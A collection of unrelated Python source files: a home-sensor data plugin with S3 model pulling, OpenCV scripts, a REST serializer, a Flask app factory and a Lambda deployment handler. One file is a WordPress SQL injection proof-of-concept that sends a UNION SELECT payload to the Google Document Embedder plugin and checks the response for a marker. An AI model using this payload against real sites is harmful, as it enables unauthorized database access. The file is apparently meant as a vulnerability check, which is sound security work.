datum_df_title = Plugin.datums_df_title(datum_df)
if "bin_timestamp" not in datum_df:
datum_df.index = datum_df.index.astype(numpy.int64) // 10 ** 9
datum_df.index.name = "bin_timestamp"
datum_df.reset_index(inplace=True)
            datum_df = datum_df.reindex_axis(sorted(datum_df.columns), axis=1)  # assign the result; reindex_axis returns a new frame
Plugin.datums_df_title(datum_df, datum_df_title)
return datum_df
@staticmethod
def datums_df_filter(datum_df, datum_options):
datum_df_title = Plugin.datums_df_title(datum_df)
if datum_options is not None:
datum_df = Plugin.datums_df_reindex(datum_df)
if "start" in datum_options:
datum_df = datum_df[datum_df.index >= pandas.to_datetime(datum_options["start"], unit="s")[0]]
if "finish" in datum_options:
datum_df = datum_df[datum_df.index <= pandas.to_datetime(datum_options["finish"], unit="s")[0]]
Plugin.datums_df_title(datum_df, datum_df_title)
return datum_df
@staticmethod
def datums_df_resample(datum_df, datum_options):
datum_df_title = Plugin.datums_df_title(datum_df)
if datum_options is not None:
if "period" in datum_options:
datum_df = getattr(datum_df.resample(str(datum_options["period"][0]) + "S"),
"max" if "method" not in datum_options else datum_options["method"][0])()
Plugin.datums_df_title(datum_df, datum_df_title)
return datum_df
@staticmethod
def datums_df_fill(datum_df, datum_df_columns, datum_options):
datum_df_title = Plugin.datums_df_title(datum_df)
if datum_options is not None:
if "fill" in datum_options:
if datum_options["fill"][0] == "linear":
try:
datum_df[datum_df_columns] = datum_df[datum_df_columns].interpolate(method="time")
except TypeError as type_error:
anode.Log(logging.WARN).log("Plugin", "state",
lambda: "[plugin] could not interpolate data frame column [{}]".format(
type_error))
if datum_options["fill"][0] == "linear" or datum_options["fill"][0] == "forwardback":
datum_df[datum_df_columns] = datum_df[datum_df_columns].fillna(method="ffill").fillna(method="bfill")
if datum_options["fill"][0] == "linear" or datum_options["fill"][0] == "zeros":
datum_df[datum_df_columns] = datum_df[datum_df_columns].fillna(0)
Plugin.datums_df_title(datum_df, datum_df_title)
return datum_df
@staticmethod
def datums_df_data_pretty(datum_df):
datum_df_title = Plugin.datums_df_title(datum_df)
timestamps = []
if "Time" in datum_df:
timestamps.append("Time")
if "bin_timestamp" in datum_df:
timestamps.append("bin_timestamp")
for timestamp in timestamps:
datum_df[timestamp] = datum_df[timestamp].apply(
lambda epoch: datetime.datetime.fromtimestamp(epoch).strftime("%Y-%m-%d %H:%M:%S"))
Plugin.datums_df_title(datum_df, datum_df_title)
return datum_df
@staticmethod
def datums_df_metadata_pretty(datum_df):
datum_df_columns_deletes = []
datum_df_columns_renames = {}
datum_df_columns_renames_order = {}
datum_df_columns_renames_tokens = {}
datum_df_columns_renames_tokens_unit = set()
datum_df_columns_renames_tokens_metric0 = set()
datum_df_columns_renames_tokens_metric2 = set()
datum_df_columns_renames_tokens_metric2_type = set()
datum_df_columns_renames_tokens_metric3_type = set()
for datum_df_column in datum_df.columns:
if datum_df_column == "bin_timestamp":
datum_df_columns_renames[datum_df_column] = "Time"
datum_df_columns_renames_order[datum_df_column] = "0"
elif datum_df_column.startswith("data_value"):
datum_df_column_tokens_all = datum_df_column.split("data_value_scaled@")[1].split("&")
datum_df_column_tokens_metric = datum_df_column_tokens_all[0].split("=")[1]
datum_df_column_tokens_subset = datum_df_column_tokens_metric.split(".")
datum_df_column_tokens_subset.append(datum_df_column_tokens_all[1].split("=")[1])
datum_df_columns_renames_tokens_unit.add(
urllib.unquote_plus(datum_df_column_tokens_all[3].split("=")[1].encode("utf-8")).decode("utf-8"))
datum_df_columns_renames_tokens_metric0.add(datum_df_column_tokens_subset[0])
datum_df_columns_renames_tokens_metric2.add(datum_df_column_tokens_subset[2])
datum_df_columns_renames_tokens_metric2_type.add(
"".join([datum_df_column_tokens_subset[2], datum_df_column_tokens_subset[3]]))
datum_df_columns_renames_tokens_metric3_type.add("".join(datum_df_column_tokens_subset[0:4]))
datum_df_column_tokens_subset.append("".join(["(", " ".join(
[re.search(r"\d+", datum_df_column_tokens_all[2].split("=")[1]).group(),
datum_df_column_tokens_all[2].split("=")[1].replace(
re.search(r"\d+", datum_df_column_tokens_all[2].split("=")[1]).group(), "").title()]), ")"]))
datum_df_columns_renames_order[datum_df_column] = \
(str(DATUM_SCHEMA_METRICS[datum_df_column_tokens_metric]) + datum_df_column_tokens_all[2]) \
if datum_df_column_tokens_all[0].split("=")[1] in DATUM_SCHEMA_METRICS else datum_df_column_tokens_metric
datum_df_columns_renames_tokens[datum_df_column] = datum_df_column_tokens_subset
elif datum_df_column.startswith("data_timestamp"):
datum_df_columns_deletes.append(datum_df_column)
for datum_df_columns_delete in datum_df_columns_deletes:
del datum_df[datum_df_columns_delete]
for datum_df_columns_renames_token in datum_df_columns_renames_tokens:
datum_df_columns_renames_token_subset = []
if len(datum_df_columns_renames_tokens_metric0) > 1:
datum_df_columns_renames_token_subset.append(datum_df_columns_renames_tokens[datum_df_columns_renames_token][0].title())
if len(datum_df_columns_renames_tokens_metric2) == len(datum_df_columns_renames_tokens):
datum_df_columns_renames_token_subset.append(datum_df_columns_renames_tokens[datum_df_columns_renames_token][2].title())
else:
datum_df_columns_renames_tokens_metric2_type_str = datum_df_columns_renames_tokens[datum_df_columns_renames_token][
2].title() if \
(datum_df_columns_renames_tokens[datum_df_columns_renames_token][3] == "point" or
datum_df_columns_renames_tokens[datum_df_columns_renames_token][3] == "integral") else " ".join(
[datum_df_columns_renames_tokens[datum_df_columns_renames_token][2].title(),
datum_df_columns_renames_tokens[datum_df_columns_renames_token][3].title()])
if len(datum_df_columns_renames_tokens_metric2_type) == len(datum_df_columns_renames_tokens):
datum_df_columns_renames_token_subset.append(datum_df_columns_renames_tokens_metric2_type_str)
elif len(datum_df_columns_renames_tokens_metric3_type) == len(datum_df_columns_renames_tokens):
datum_df_columns_renames_token_subset.append(
" ".join([datum_df_columns_renames_tokens[datum_df_columns_renames_token][1].title(),
datum_df_columns_renames_tokens_metric2_type_str]))
else:
datum_df_columns_renames_token_subset.append(
" ".join([datum_df_columns_renames_tokens[datum_df_columns_renames_token][1].title(),
datum_df_columns_renames_tokens_metric2_type_str,
datum_df_columns_renames_tokens[datum_df_columns_renames_token][4]]))
datum_df_columns_renames[datum_df_columns_renames_token] = " ".join(datum_df_columns_renames_token_subset)
if len(datum_df_columns_renames) == 2:
for datum_df_column_old, datum_df_column_new in datum_df_columns_renames.iteritems():
if datum_df_column_old.startswith("data_value_scaled@"):
datum_df_columns_renames[datum_df_column_old] = \
" ".join([datum_df_column_new, datum_df_columns_renames_tokens[datum_df_column_old][4]])
for datum_df_columns_rename in datum_df_columns_renames:
datum_df_columns_renames[datum_df_columns_rename] = datum_df_columns_renames[datum_df_columns_rename]. \
replace("-", " ").replace("1 All Time", "All Time")
datum_df.rename(columns=datum_df_columns_renames, inplace=True)
datum_df_columns_reorder = []
for datum_df_column_old in sorted(datum_df_columns_renames_order,
key=lambda datum_df_column_sort: (datum_df_columns_renames_order[datum_df_column_sort])):
datum_df_columns_reorder.append(datum_df_columns_renames[datum_df_column_old])
datum_df = datum_df[datum_df_columns_reorder]
Plugin.datums_df_title(datum_df, (" & ".join(datum_df_columns_renames_tokens_metric0).title() +
" (" + ", ".join(datum_df_columns_renames_tokens_unit) + ")").replace("-", " "))
return datum_df
def datum_value(self, data, keys=None, default=None, factor=1):
# noinspection PyBroadException
try:
value = data if keys is None else reduce(operator.getitem, keys, data)
if isinstance(value, basestring) and not value:
value = None
if value is None:
value = default
anode.Log(logging.WARN).log("Plugin", "state",
lambda: "[{}] setting value {} to default [{}] from response [{}]".format(
self.name, keys, default, data))
return value if not isinstance(value, numbers.Number) else int(value * factor)
except Exception as exception:
anode.Log(logging.ERROR).log("Plugin", "error",
lambda: "[{}] setting value {} to default [{}] from response [{}] due to error [{}]".format(
self.name, keys, default, data, exception), exception)
return None if default is None else int(default * factor)
def datums_store(self):
log_timer = anode.Log(logging.INFO).start()
for datum_metric in self.datums:
for datum_type in self.datums[datum_metric]:
for datum_unit in self.datums[datum_metric][datum_type]:
for datum_bin in self.datums[datum_metric][datum_type][datum_unit]:
if DATUM_QUEUE_HISTORY in self.datums[datum_metric][datum_type][datum_unit][datum_bin]:
self.datum_merge_buffer_history(
self.datums[datum_metric][datum_type][datum_unit][datum_bin][DATUM_QUEUE_BUFFER],
self.datums[datum_metric][datum_type][datum_unit][datum_bin][DATUM_QUEUE_HISTORY])
else:
self.datums[datum_metric][datum_type][datum_unit][datum_bin][DATUM_QUEUE_BUFFER].clear()
if len(self.datums) > 0:
self.pickled_put(os.path.join(self.config["db_dir"], "anode"), os.path.join(
"asystem", "anode", self.name, "model/pickle/pandas/none/amodel_version=" + APP_VERSION,
"amodel_model=" + APP_MODEL_VERSION, self.name + ".pkl"), self.datums, True)
metrics_count = sum(len(units)
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values())
datums_count = sum(0 if DATUM_QUEUE_HISTORY not in bins else (
sum(len(partitions["data_df"].index) for partitions in bins[DATUM_QUEUE_HISTORY].values()))
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values()
for bins in units.values())
log_timer.log("Plugin", "timer",
lambda: "[{}] state stored [{}] metrics and [{}] datums".format(self.name, metrics_count, datums_count),
context=self.datums_store)
def datums_load(self):
log_timer = anode.Log(logging.INFO).start()
metrics_count = 0
datums_pickled = self.pickled_get(os.path.join(self.config["db_dir"], "anode"), name=self.name, cache=False)
model_version = int(APP_MODEL_VERSION)
while model_version >= 1000 and self.name in datums_pickled and str(model_version) not in datums_pickled[self.name]:
model_version -= 1
self.datums = datums_pickled[self.name][str(model_version)][1] \
if self.name in datums_pickled and str(model_version) in datums_pickled[self.name] else {}
metrics_count = sum(len(units)
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values())
for datum_metric in self.datums:
for datum_type in self.datums[datum_metric]:
for datum_unit in self.datums[datum_metric][datum_type]:
for datum_bin in self.datums[datum_metric][datum_type][datum_unit]:
self.datums[datum_metric][datum_type][datum_unit][datum_bin][DATUM_QUEUE_BUFFER].clear()
datums_count = sum(0 if DATUM_QUEUE_HISTORY not in bins else (
sum(len(partitions["data_df"].index) for partitions in bins[DATUM_QUEUE_HISTORY].values()))
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values()
for bins in units.values())
log_timer.log("Plugin", "timer",
lambda: "[{}] state loaded [{}] metrics and [{}] datums from [{}]".format(
self.name, metrics_count, datums_count, (
self.name + "-" + APP_MODEL_VERSION + "-" +
datums_pickled[self.name][APP_MODEL_VERSION][
0]) if self.name in datums_pickled and APP_MODEL_VERSION in datums_pickled[
self.name] else ""),
                      context=self.datums_load)
def get_time(self):
return calendar.timegm(time.gmtime()) if not self.is_clock else (
(1 if self.reactor.seconds() == 0 else int(self.reactor.seconds())) +
self.get_time_period(self.time_boot, 24 * 60 * 60))
def get_time_period(self, timestamp, period):
return period if period > timestamp else \
((timestamp + self.time_tmz_offset) - (timestamp + self.time_tmz_offset) % period - self.time_tmz_offset)
def pickled_status(self, store, path, model_lower=None, model_upper=None):
log_timer = anode.Log(logging.INFO).start()
path_dirty = False
path_filtered = True
pickle_metadata = re.search(PICKLE_PATH_REGEX, path)
if pickle_metadata is not None:
if (model_lower is None or model_lower <= pickle_metadata.group(4)) and \
(model_upper is None or model_upper >= pickle_metadata.group(4)):
path_filtered = False
pickle_cache = self.pickled_get(store, name=pickle_metadata.group(1), model=pickle_metadata.group(4))
path_dirty = pickle_metadata.group(3).endswith("-SNAPSHOT") or \
pickle_metadata.group(1) not in pickle_cache or \
pickle_metadata.group(4) not in pickle_cache[pickle_metadata.group(1)] or \
Plugin.compare_version(pickle_metadata.group(3),
pickle_cache[pickle_metadata.group(1)][pickle_metadata.group(4)][0]) > 0
log_timer.log("Plugin", "timer", lambda: "[{}] status pickled [{}filtered, {}dirty] [{}]".format(
self.name, "" if path_filtered else "not ", "" if path_dirty else "not ", path), context=self.pickled_status)
return path_filtered, path_dirty
def pickled_put(self, store, path, library, pickle=False):
log_timer = anode.Log(logging.INFO).start()
pickle_path = None
pickle_metadata = re.search(PICKLE_PATH_REGEX, path)
if pickle_metadata is not None:
pickle_path = os.path.join(store, pickle_metadata.group(1), "model/pickle", pickle_metadata.group(2),
"none/amodel_version=" + pickle_metadata.group(3), "amodel_model=" + pickle_metadata.group(4),
pickle_metadata.group(1) + ".pkl")
            if not os.path.exists(os.path.dirname(pickle_path)):
                os.makedirs(os.path.dirname(pickle_path))
if pickle:
if pickle_metadata.group(2) == "pandas":
pandas.to_pickle(library, pickle_path)
else:
raise Exception("Unknown pickle write format [{}]".format(pickle_metadata[0]))
else:
with open(pickle_path, "wb") as pickle_file:
pickle_file.write(library)
self.pickled_get(store, path=path, warm=True)
log_timer.log("Plugin", "timer", lambda: "[{}] put pickled [{}] to [{}]".format(self.name, "-".join(
"" if pickle_metadata is None else pickle_metadata.group(3, 2, 1)), "" if pickle_path is None else ("file://" + pickle_path)),
context=self.pickled_put)
return pickle_path
def pickled_get(self, store, path=None, name=None, model=None, warm=False, cache=True, flush=False):
log_timer = anode.Log(logging.INFO).start()
if flush and os.path.isdir(store):
shutil.rmtree(store)
os.makedirs(store)
if cache:
if store not in PICKLES_CACHE:
PICKLES_CACHE[store] = {}
pickle_cache = PICKLES_CACHE[store]
else:
pickle_cache = {}
if path is not None:
pickle_metadata = re.search(PICKLE_PATH_REGEX, path)
if pickle_metadata is not None:
name = pickle_metadata.group(1)
model = pickle_metadata.group(4)
if not cache or warm:
pickle_metadata_cache = {}
for root_dir, parent_dirs, file_names in os.walk(store):
for file_name in file_names:
file_path = os.path.join(root_dir, file_name)
pickle_metadata = re.search(PICKLE_PATH_REGEX, file_path)
if pickle_metadata is not None:
if (name is None or name == pickle_metadata.group(1)) and (model is None or model == pickle_metadata.group(4)):
if APP_VERSION.endswith("-SNAPSHOT") or not pickle_metadata.group(3).endswith("-SNAPSHOT"):
if pickle_metadata.group(1) not in pickle_metadata_cache:
pickle_metadata_cache[pickle_metadata.group(1)] = {}
if pickle_metadata.group(4) not in pickle_metadata_cache[pickle_metadata.group(1)]:
pickle_metadata_cache[pickle_metadata.group(1)][pickle_metadata.group(4)] = {}
pickle_metadata_cache[pickle_metadata.group(1)][pickle_metadata.group(4)][pickle_metadata.group(3)] = \
(pickle_metadata.group(2), file_path)
for pickle_name in pickle_metadata_cache:
for pickle_model in pickle_metadata_cache[pickle_name]:
pickle_version = sorted(pickle_metadata_cache[pickle_name][pickle_model].keys(), cmp=Plugin.compare_version)[-1]
pickle_metadata = pickle_metadata_cache[pickle_name][pickle_model][pickle_version]
pickle_cache[pickle_name] = pickle_cache[pickle_name] if pickle_name in pickle_cache else {}
if pickle_metadata[0] == "pandas":
pickle_cache[pickle_name][pickle_model] = (pickle_version, pandas.read_pickle(pickle_metadata[1]))
elif pickle_metadata[0] == "joblib":
unpickled = joblib.load(pickle_metadata[1])
unpickled['execute'] = dill.load(StringIO(unpickled['execute'].getvalue()))
pickle_cache[pickle_name][pickle_model] = (pickle_version, unpickled)
else:
raise Exception("Unknown pickle read format [{}]".format(pickle_metadata[0]))
anode.Log(logging.INFO).log("Plugin", "timer", lambda: "[{}] read pickled [{}] using [{}]".format(
self.name, pickle_name + "-" + pickle_model + "-" + pickle_version, pickle_metadata[0]))
pickle_cache = pickle_cache if name is None else ({name: pickle_cache[name]} if name in pickle_cache else {name: {}})
pickle_cache = pickle_cache if model is None else ({name: {model: pickle_cache[name][model]}}
if (name in pickle_cache and model in pickle_cache[name]) else {name: {}})
pickle = pickle_cache[name] if name in pickle_cache else {}
log_timer.log("Plugin", "timer", lambda: "[{}] got pickled [{}]".format(self.name, ", ".join(
[name + "-{}-{}".format(model, pickle[model][0]) for model in pickle.keys()])), context=self.pickled_get)
return pickle_cache
@staticmethod
def compare_version(this, that):
if this is not None and that is not None and \
(this.endswith("-SNAPSHOT") or that.endswith("-SNAPSHOT")) and \
this.replace("-SNAPSHOT", "") == that.replace("-SNAPSHOT", ""):
return 0 if this == that else (1 if that.endswith("-SNAPSHOT") else -1)
else:
return 0 if this == that else (1 if this > that else -1)
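    # Illustrative behaviour of compare_version (worked examples, not a doctest shipped
    # with the project):
    #   compare_version("10.000.0002", "10.000.0001")          -> 1   (plain string ordering)
    #   compare_version("10.000.0002-SNAPSHOT", "10.000.0002") -> -1  (a SNAPSHOT sorts below its release)
    #   compare_version("10.000.0002", "10.000.0002-SNAPSHOT") -> 1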
@staticmethod
def datum_field_swap(field):
return "" if field is None else "".join([ESCAPE_SWAPS.get(field_char, field_char) for field_char in field])
@staticmethod
def datum_version_encode(version, base=100000000):
return (-1 if version.endswith("-SNAPSHOT") else 1) * ((int(re.sub("[^0-9]", "", version)) - base + 1) if (
int(re.sub("[^0-9]", "", version)) >= base) else int(re.sub("[^0-9]", "", version)))
@staticmethod
def datum_field_encode(field):
field_encoded = urllib.quote_plus(Plugin.datum_field_swap(field))
for escaped, unescaped in ESCAPE_SEQUENCES.iteritems():
field_encoded = field_encoded.replace(unescaped, escaped)
return field_encoded
@staticmethod
def datum_field_decode(field):
fields_decoded = field.split("__")
for index, field in enumerate(fields_decoded):
for escaped, unescaped in ESCAPE_SEQUENCES.iteritems():
fields_decoded[index] = fields_decoded[index].replace(escaped, unescaped)
field_decoded = urllib.unquote_plus(Plugin.datum_field_swap("_".join(fields_decoded)))
        return field_decoded if isinstance(field_decoded, unicode) else field_decoded.decode("utf-8")
@staticmethod
def get_seconds(scalar, unit):
if unit == "second":
return scalar
elif unit == "minute":
return scalar * 60
elif unit == "hour":
return scalar * 60 * 60
elif unit == "day":
return scalar * 60 * 60 * 24
elif unit == "day_Dtime":
return scalar * 60 * 60 * 24
elif unit == "night_Dtime":
return scalar * 60 * 60 * 24
elif unit == "month":
return scalar * 60 * 60 * 24 * 30.42
elif unit == "year":
return scalar * 60 * 60 * 24 * 365
elif unit == "all_Dtime":
return scalar * -1
else:
raise Exception("Unknown time unit [{}]".format(unit))
@staticmethod
def get(parent, plugin_name, config, reactor):
plugin = getattr(import_module("anode.plugin") if hasattr(anode.plugin, plugin_name.title()) else
import_module("anode.plugin." + plugin_name), plugin_name.title())(parent, plugin_name, config, reactor)
anode.Log(logging.INFO).log("Plugin", "state", lambda: "[{}] initialised".format(plugin_name))
return plugin
__metaclass__ = abc.ABCMeta
def __init__(self, parent, name, config, reactor):
self.has_poll = getattr(self, "_poll", None) is not None
self.has_push = getattr(self, "_push", None) is not None
self.is_clock = isinstance(reactor, Clock)
self.anode = parent
self.name = name
self.config = config
self.reactor = reactor
self.datums = {}
self.time_seen = None
self.time_boot = calendar.timegm(time.gmtime())
time_local = time.localtime()
self.time_tmz_offset = calendar.timegm(time_local) - calendar.timegm(time.gmtime(time.mktime(time_local)))
self.datums_buffer_batch = BUFFER_BATCH_DEFAULT if ("buffer_ticks" not in self.config or self.config["buffer_ticks"] < 1) \
else self.config["buffer_ticks"]
self.datums_load()
PICKLE_PATH_REGEX = ".*/[a-zA-z]*/([a-zA-z]*)/model/pickle/([a-zA-z]*)/none/" \
"amodel_version=([1-9][0-9]\.[0-9]{3}.[0-9]{4}.*)/amodel_model=([1-9][0-9]{3})/.*\.pkl"
ID_BYTE = '{s:0^12}'.format(s=format(get_mac(), "x")).decode("hex")
ID_HEX = ID_BYTE.encode("hex").upper()
ID_HEX_STRING = ':'.join(a + b for a, b in zip(ID_HEX[::2], ID_HEX[1::2]))
ID_BASE64 = base64.b64encode(str(ID_BYTE))
SVG_EMPTY = """<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
</svg>"""
ESCAPE_SWAPS = {
"_": ".",
".": "_"
}
ESCAPE_SEQUENCES = {
"__": "_",
"_X": ".",
"_D": "-",
"_P": "%"
}
HTTP_TIMEOUT = 10
BUFFER_BATCH_DEFAULT = 60
SERIALISATION_BATCH = 1000
SERIALISATION_BATCH_SLEEP = 0.3
DATUM_TIMESTAMP_MIN = -2211753600
DATUM_TIMESTAMP_MAX = 32500915200
DATUM_QUEUE_MIN = "min"
DATUM_QUEUE_MAX = "max"
DATUM_QUEUE_LAST = "last"
DATUM_QUEUE_PUBLISH = "publish"
DATUM_QUEUE_BUFFER = "buffer"
DATUM_QUEUE_HISTORY = "history"
DATUM_LOCATION_DEFAULT = "Home"
DATUM_LOCATIONS = {
"Ada",
"Dining",
"Edwin",
"Kitchen",
"Laundry",
"Lounge",
"Office",
"Pantry",
"Parents",
"Ensuite",
"Bathroom",
"Utility",
"Shed",
"Basement",
"Deck",
"Roof",
}
PICKLES_CACHE = {}
DATUM_SCHEMA_TO_ASCII = {}
DATUM_SCHEMA_FROM_ASCII = {}
DATUM_SCHEMA_FILE = open(os.path.dirname(__file__) + "/../avro/datum.avsc", "rb").read()
DATUM_SCHEMA_JSON = json.loads(DATUM_SCHEMA_FILE)
DATUM_SCHEMA_AVRO = avro.schema.parse(DATUM_SCHEMA_FILE)
DATUM_SCHEMA_MODEL = {DATUM_SCHEMA_JSON["fields"][i]["name"].encode("utf-8"): i * 10 for i in range(len(DATUM_SCHEMA_JSON["fields"]))}
DATUM_SCHEMA_METRICS = {Plugin.datum_field_decode(DATUM_SCHEMA_JSON["fields"][4]["type"]["symbols"][i].encode("utf-8")):
i * 10 for i in range(len(DATUM_SCHEMA_JSON["fields"][4]["type"]["symbols"]))}
PUBLISH_METADATA_CACHE = {}
PUBLISH_BATCH_TOPIC = "/anode_version=" + APP_VERSION + "/anode_id=" + ID_HEX + "/anode_model=" + APP_MODEL_VERSION
class ModelPull(Plugin):
def poll(self):
self.http_get(self.config["model_pull_region"], self.config["model_pull_bucket"], "/",
"list-type=2&max-keys=1000000&prefix=asystem", self.list_models)
def http_get(self, region, bucket, path, params, callback):
host = bucket + ".s3-" + region + ".amazonaws.com"
url = "http://" + host + path + "?" + params
payload = auth.compute_hashed_payload(b"")
timestamp = datetime.datetime.utcnow()
headers = {"host": host, "x-amz-content-sha256": payload, "x-amz-date": timestamp.strftime(auth.ISO8601_FMT)}
headers["Authorization"] = auth.compute_auth_header(headers, "GET", timestamp, region, bucket, path, params, payload,
os.environ["AWS_ACCESS_KEY"], os.environ["AWS_SECRET_KEY"])
connection_pool = self.config["pool"] if "pool" in self.config else None
treq.get(url, headers=headers, timeout=HTTP_TIMEOUT, pool=connection_pool).addCallbacks(
lambda response, url=url, callback=callback: self.http_response(response, url, callback),
errback=lambda error, url=url: anode.Log(logging.ERROR).log("Plugin", "error",
lambda: "[{}] error processing HTTP GET [{}] with [{}]".format(
self.name, url, error.getErrorMessage())))
def http_response(self, response, url, callback):
if response.code == 200:
treq.content(response).addCallbacks(callback, callbackKeywords={"url": url})
else:
anode.Log(logging.ERROR).log("Plugin", "error",
lambda: "[{}] error processing HTTP response [{}] with [{}]".format(self.name, url, response.code))
def list_models(self, content, url):
log_timer = anode.Log(logging.DEBUG).start()
try:
for key_remote in xmltodict.parse(content)["ListBucketResult"]["Contents"]:
path_remote = "s3://" + self.config["model_pull_bucket"] + "/" + key_remote["Key"].encode("utf-8")
path_status = self.pickled_status(os.path.join(self.config["db_dir"], "amodel"), path_remote)
if not path_status[0] and path_status[1]:
self.http_get(self.config["model_pull_region"], self.config["model_pull_bucket"], "/" +
path_remote.replace("s3://" + self.config["model_pull_bucket"] + "/", ""), "", self.pull_model)
elif not path_status[0]:
self.verified_model(path_remote)
except Exception as exception:
anode.Log(logging.ERROR).log("Plugin", "error", lambda: "[{}] error [{}] processing response:\n{}"
.format(self.name, exception, content), exception)
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.list_models)
def pull_model(self, content, url):
log_timer = anode.Log(logging.DEBUG).start()
try:
path_remote = url[:-1]
self.pickled_put(os.path.join(self.config["db_dir"], "amodel"), path_remote, content)
self.verified_model(path_remote)
except Exception as exception:
anode.Log(logging.ERROR).log("Plugin", "error", lambda: "[{}] error [{}] processing binary response of length [{}]"
.format(self.name, exception, len(content)), exception)
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.pull_model)
def verified_model(self, path=None):
anode.Log(logging.INFO).log("Plugin", "state", lambda: "[{}] verified model [{}]".format(self.name, path))
def __init__(self, parent, name, config, reactor):
super(ModelPull, self).__init__(parent, name, config, reactor)
self.pickled_get(os.path.join(self.config["db_dir"], "amodel"), flush=True)
| StarcoderdataPython |
60342 | <reponame>csadsl/poc_exp
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = ko0zhi
#__Service_ = Wordpress
#__Refer___ = http://www.beebeeto.com/pdb/poc-2014-0174/
#___Type___ = sql
#___name___ = http://www.exploit-db.com/exploits/35447/
'''
WordPress plugin vulnerability: Google Document Embedder (SQL injection)
'''
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
payload = "wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,2,3,%20CONCAT(CAST(CHAR(97,58,49,58,123,115,58,54,58,34,118,119,95,99,115,115,34,59,115,58)%20as%20CHAR),%20LENGTH(md5(1234)),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20md5(1234),%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))"
url = arg + payload
code, head, res, errcode, _ = curl.curl('%s' % url)
    if code == 200 and '77596ce7097c5f353cffcc865487d9e2' in res:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('wordpress', 'http://www.example.com/')[1]) | StarcoderdataPython |
134448 | import cv2
import numpy as np
def filterClusters(clusters):
# Remove things with angle far from median
for i in range(len(clusters)):
cluster = clusters[i]
if len(cluster) > 9:
median = np.median([facelet[2] for facelet in cluster])
clusters[i] = [facelet for facelet in cluster if abs(facelet[2] - median) < 10]
    # Repeatedly drop the facelet whose removal maximises the solidity of the remaining cluster, until 9 remain
for cluster in clusters:
while len(cluster) > 9:
maxSolidity = 0
minIndex = 0
for index in range(len(cluster)):
            c = np.vstack([cluster[i][0] for i in range(len(cluster)) if i != index])  # pass a list, not a generator
area = cv2.contourArea(c)
hull = cv2.convexHull(c)
hull_area = cv2.contourArea(hull)
solidity = float(area)/hull_area
                if solidity > maxSolidity:  # compare solidity (not area) so the best removal candidate is kept
maxSolidity = solidity
minIndex = index
del(cluster[minIndex]) | StarcoderdataPython |
43451 | <filename>api/notificationserializer.py
from rest_framework import serializers
from shared.models import Notification
class NotificationSerializer(serializers.Serializer):
title = serializers.CharField(max_length=60)
content = serializers.CharField()
date = serializers.DateTimeField()
source = serializers.CharField(max_length=50)
| StarcoderdataPython |
136105 | <reponame>imankulov/flask-boilerplate<gh_stars>0
"""
Flask application.
The module is used to initialize the main project: load configuration, attach
blueprints and initialize services.
What app.py can import?
-----------------------
Services, configuration, and everything that is needed to initialize blueprints,
including controllers and models inside apps. In other words, app.py depends on
a lot of things in the project.
Who can import app.py?
----------------------
The module is not imported from anywhere except from a WSGI server in
production, and conftests.py for pytest.
"""
from typing import Any, Optional
from flask import Flask
from roman_discovery.flask import discover_flask
def app(extra_config: Optional[dict[str, Any]] = None) -> Flask:
"""
Initialize and return a Flask application.
extra_config: a dict with extra configuration options, that need to be applied
to the application before initializing.
"""
flask_app = Flask(__name__, instance_relative_config=True)
flask_app.config.from_object("{{ cookiecutter.project_slug }}.config")
if extra_config:
flask_app.config.from_mapping(extra_config)
# Configure services and extensions
discover_flask("{{ cookiecutter.project_slug }}", flask_app)
return flask_app
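# Illustrative usage only (not part of the boilerplate): a WSGI entry point or a pytest
# fixture would call the factory, optionally overriding configuration. The config keys
# shown here are hypothetical examples, not keys the project requires.
#
#     flask_app = app(extra_config={"TESTING": True})
#     flask_app.run()   # or hand `flask_app` to gunicorn / the pytest client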
| StarcoderdataPython |
3208734 | import os
import logging
import json
import boto3
logger = logging.getLogger()
logger.setLevel(logging.INFO)
client = boto3.client('lambda')
code_pipeline = boto3.client('codepipeline')
def put_job_success(job, message):
logger.info('Putting job success')
logger.info(message)
code_pipeline.put_job_success_result(jobId=job)
def put_job_failure(job, message):
logger.info('Putting job failure')
logger.info(message)
code_pipeline.put_job_failure_result(
jobId=job,
failureDetails={'message': message, 'type': 'JobFailed'},
)
def continue_job_later(job, message):
continuation_token = json.dumps({'previous_job_id': job})
logger.info('Putting job continuation')
logger.info(message)
code_pipeline.put_job_success_result(
jobId=job,
continuationToken=continuation_token,
)
def handler(event, context):
job_id = "Unknoun"
try:
logger.info("Getting job details")
job_id = event['CodePipeline.job']['id']
job_data = event['CodePipeline.job']['data']
logger.info("Getting user parameters")
user_parameters = job_data['actionConfiguration']['configuration']['UserParameters']
params = json.loads(user_parameters)
bucket = params['sourceBucket']
key = params['sourceKey']
function_name = params["functionName"]
logger.info("Updating lambda source")
response = client.update_function_code(
FunctionName=function_name,
S3Bucket=bucket,
S3Key=key,
)
put_job_success(job_id, 'Source Updated')
except Exception as e:
logger.info(str(e))
put_job_failure(job_id, 'Function exception: ' + str(e))
logger.info("Complete")
return "Complete."
| StarcoderdataPython |
3387657 | <gh_stars>0
import cv2
import numpy as np
# Helper function to display an image in a window
def viewImage(image, window_name='window name'):
cv2.imshow(window_name, image)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Read and display the input images
cone = cv2.imread('2.png')
road = cv2.imread('1.png')
viewImage(cone, 'cone')
viewImage(road, 'road')
# Convert them to grayscale
gray_cone = cv2.cvtColor(cone, cv2.COLOR_BGR2GRAY)
gray_road = cv2.cvtColor(road, cv2.COLOR_BGR2GRAY)
viewImage(gray_road)
# Binarize (threshold) the cone image
ret, threshold_cone = cv2.threshold(gray_cone, 150, 255, cv2.THRESH_BINARY)
viewImage(threshold_cone)
